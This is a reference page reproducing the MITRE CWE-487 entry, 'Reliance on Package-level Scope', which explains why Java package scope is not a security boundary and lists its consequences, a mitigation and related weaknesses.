BaseIncomplete

CWE-487Reliance on Package-level Scope

Category: other

Description

Java packages are not inherently closed; therefore, relying on them for code security is not a good practice. The purpose of package scope is to prevent accidental access by other parts of a program. This is an ease-of-software-development feature but not a security feature.

Common consequences· 2

  • Confidentiality — Read Application Data
    Any data in a Java package can be accessed outside of the Java framework if the package is distributed.
  • Integrity — Modify Application Data
    The data in a Java class can be modified by anyone outside of the Java framework if the package is distributed.

Potential mitigations· 1

  • [Architecture and Design, Implementation]Data should be private static and final whenever possible. This will assure that your code is protected by instantiating early, preventing access and tampering.

References

  1. https://cwe.mitre.org/data/definitions/487.html

Related by meaning· 6

Nearest entities by semantic similarity across the cs-graph corpus.

CWE
Use of Inner Class Containing Sensitive Data
CWE
Public Static Final Field References Mutable Object
CWE
Direct Use of Unsafe JNI
CWE
Serializable Class Containing Sensitive Data
CWE
Public Static Field Not Marked Final
CWE
Cloneable Class Containing Sensitive Information
Sourced from MITRE CWE 4.20. Curated for EU compliance use cases by Adam Lundqvist, Founder at SQUR.